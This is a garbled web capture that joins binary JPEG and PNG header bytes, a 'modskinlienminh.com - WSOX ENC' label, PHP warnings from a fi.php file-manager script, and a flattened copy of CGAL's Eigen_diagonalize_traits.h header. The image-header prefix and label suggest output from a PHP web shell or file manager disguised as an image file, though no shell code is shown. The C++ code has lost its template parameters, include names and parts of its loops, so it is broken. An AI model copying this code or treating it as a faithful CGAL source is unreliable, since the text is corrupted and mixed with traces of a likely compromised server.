1:45 PM 11/12/2025 ���� JFIF    �� �        "" $(4,$&1'-=-157:::#+?D?8C49:7 7%%77777777777777777777777777777777777777777777777777��  { �" ��     �� 5    !1AQa"q�2��BR��#b�������  ��  ��   ? ��D@DDD@DDD@DDkK��6 �UG�4V�1�� �����릟�@�#���RY�dqp� ����� �o�7�m�s�<��VPS�e~V�چ8���X�T��$��c�� 9��ᘆ�m6@ WU�f�Don��r��5}9��}��hc�fF��/r=hi�� �͇�*�� b�.��$0�&te��y�@�A�F�=� Pf�A��a���˪�Œ�É��U|� � 3\�״ H SZ�g46�C��צ�ے �b<���;m����Rpع^��l7��*�����TF�}�\�M���M%�'�����٠ݽ�v� ��!-�����?�N!La��A+[`#���M����'�~oR�?��v^)��=��h����A��X�.���˃����^Ə��ܯsO"B�c>; �e�4��5�k��/CB��.  �J?��;�҈�������������������~�<�VZ�ꭼ2/)Í”jC���ע�V�G�!���!�F������\�� Kj�R�oc�h���:Þ I��1"2�q×°8��Р@ז���_C0�ր��A��lQ��@纼�!7��F�� �]�sZ B�62r�v�z~�K�7�c��5�.���ӄq&�Z�d�<�kk���T&8�|���I���� Ws}���ǽ�cqnΑ�_���3��|N�-y,��i���ȗ_�\60���@��6����D@DDD@DDD@DDD@DDD@DDc�KN66<�c��64=r����� ÄŽ0��h���t&(�hnb[� ?��^��\��â|�,�/h�\��R��5�? �0�!צ܉-����G����٬��Q�zA���1�����V��� �:R���`�$��ik��H����D4�����#dk����� h�}����7���w%�������*o8wG�LycuT�.���ܯ7��I��u^���)��/c�,s�Nq�ۺ�;�ך�YH2���.5B���DDD@DDD@DDD@DDD@DDD@V|�a�j{7c��X�F\�3MuA×¾hb� ��n��F������ ��8�(��e����Pp�\"G�`s��m��ާaW�K��O����|;ei����֋�[�q��";a��1����Y�G�W/�߇�&�<���Ќ�H'q�m���)�X+!���=�m�ۚ丷~6a^X�)���,�>#&6G���Y��{����"" """ """ """ """ ""��at\/�a�8 �yp%�lhl�n����)���i�t��B�������������?��modskinlienminh.com - WSOX ENC ‰PNG  IHDR Ÿ f Õ†C1 sRGB ®Îé gAMA ± üa pHYs à ÃÇo¨d GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT h25jguaT5*!‰PNG  IHDR Ÿ f Õ†C1 sRGB ®Îé gAMA ± üa pHYs à ÃÇo¨d GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT h25jguaT5*!
Warning: Undefined variable $authorization in C:\xampp\htdocs\demo\fi.php on line 57

Warning: Undefined variable $translation in C:\xampp\htdocs\demo\fi.php on line 118

Warning: Trying to access array offset on value of type null in C:\xampp\htdocs\demo\fi.php on line 119

Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in C:\xampp\htdocs\demo\fi.php on line 120

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 247

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 248

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 249

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 250

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 251

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 252
// Copyright (c) 2014 INRIA Sophia-Antipolis (France). // All rights reserved. // // This file is part of CGAL (www.cgal.org) // // $URL: https://github.com/CGAL/cgal/blob/v6.1/Solver_interface/include/CGAL/Eigen_diagonalize_traits.h $ // $Id: include/CGAL/Eigen_diagonalize_traits.h b26b07a1242 $ // SPDX-License-Identifier: LGPL-3.0-or-later OR LicenseRef-Commercial // // Author(s) : Jocelyn Meyron and Quentin Mérigot // #ifndef CGAL_EIGEN_DIAGONALIZE_TRAITS_H #define CGAL_EIGEN_DIAGONALIZE_TRAITS_H #include #include // If the matrix to diagonalize is of dimension 2x2 or 3x3, Eigen // provides a faster implementation using a closed-form // algorithm. However, it offers less precision. See: // https://eigen.tuxfamily.org/dox/classEigen_1_1SelfAdjointEigenSolver.html // This is usually acceptable for CGAL algorithms but one might want // to use the slower but more accurate version. In that case, just // uncomment the following line: //#define DO_NOT_USE_EIGEN_COMPUTEDIRECT_FOR_DIAGONALIZATION #include #include namespace CGAL { namespace internal { template struct Restricted_FT { typedef double type; }; template <> struct Restricted_FT { typedef float type; }; } /// \ingroup PkgSolverInterfaceLS /// /// The class `Eigen_diagonalize_traits` provides an interface to the /// diagonalization of covariance matrices of \ref thirdpartyEigen /// "Eigen". /// /// \ref thirdpartyEigen "Eigen" version 3.1 (or later) must be available on the system. /// /// \tparam FT Number type /// \tparam dim Dimension of the matrices and vectors /// /// \cgalModels{DiagonalizeTraits} /// /// \sa https://eigen.tuxfamily.org/index.php?title=Main_Page template class Eigen_diagonalize_traits { typedef typename internal::Restricted_FT::type RFT; public: typedef std::array Vector; typedef std::array Matrix; typedef std::array Covariance_matrix; private: typedef Eigen::Matrix EigenMatrix; typedef Eigen::Matrix EigenVector; /// Construct the covariance matrix static EigenMatrix construct_covariance_matrix(const Covariance_matrix& cov) { EigenMatrix m; for(std::size_t i=0; i(CGAL::to_double(cov[(dim * i) + j - ((i * (i+1)) / 2)])); if(i != j) m(j,i) = m(i,j); } } return m; } /// Fill `eigenvalues` with the eigenvalues and `eigenvectors` with /// the eigenvectors of the selfadjoint matrix represented by `m`. /// Eigenvalues are sorted by increasing order. /// \return `true` if the operation was successful and `false` otherwise. static bool diagonalize_selfadjoint_matrix(EigenMatrix& m, EigenMatrix& eigenvectors, EigenVector& eigenvalues) { Eigen::SelfAdjointEigenSolver eigensolver; #ifndef DO_NOT_USE_EIGEN_COMPUTEDIRECT_FOR_DIAGONALIZATION if(dim == 2 || dim == 3) eigensolver.computeDirect(m); else #endif eigensolver.compute(m); if(eigensolver.info() != Eigen::Success) return false; eigenvalues = eigensolver.eigenvalues(); eigenvectors = eigensolver.eigenvectors(); return true; } public: /// Fill `eigenvalues` with the eigenvalues of the covariance matrix represented by `cov`. /// Eigenvalues are sorted by increasing order. /// \return `true` if the operation was successful and `false` otherwise. static bool diagonalize_selfadjoint_covariance_matrix(const Covariance_matrix& cov, Vector& eigenvalues) { EigenMatrix m = construct_covariance_matrix(cov); // Diagonalizing the matrix EigenVector eigenvalues_; EigenMatrix eigenvectors_; bool res = diagonalize_selfadjoint_matrix(m, eigenvectors_, eigenvalues_); if(res) { for(std::size_t i=0; i(eigenvalues_[i]); } return res; } /// Fill `eigenvalues` with the eigenvalues and `eigenvectors` with /// the eigenvectors of the covariance matrix represented by `cov`. /// Eigenvalues are sorted by increasing order. /// \return `true` if the operation was successful and `false` otherwise. static bool diagonalize_selfadjoint_covariance_matrix(const Covariance_matrix& cov, Vector& eigenvalues, Matrix& eigenvectors) { EigenMatrix m = construct_covariance_matrix(cov); // Diagonalizing the matrix EigenVector eigenvalues_; EigenMatrix eigenvectors_; bool res = diagonalize_selfadjoint_matrix(m, eigenvectors_, eigenvalues_); if(res) { for(std::size_t i=0; i(eigenvalues_[i]); for(std::size_t j=0; j(eigenvectors_(j,i)); } } else{ for(std::size_t i=0; i(0.); for(std::size_t j=0; j(0.); } } return res; } /// Extract the eigenvector associated to the largest eigenvalue /// of the covariance matrix represented by `cov`. /// \return `true` if the operation was successful and `false` otherwise. static bool extract_largest_eigenvector_of_covariance_matrix(const Covariance_matrix& cov, Vector& normal) { // Construct covariance matrix EigenMatrix m = construct_covariance_matrix(cov); // Diagonalizing the matrix EigenVector eigenvalues; EigenMatrix eigenvectors; if(! diagonalize_selfadjoint_matrix(m, eigenvectors, eigenvalues)) return false; // Eigenvalues are sorted by increasing order for(unsigned int i=0; i (eigenvectors(i, dim-1)); return true; } }; } // namespace CGAL #endif // CGAL_EIGEN_DIAGONALIZE_TRAITS_H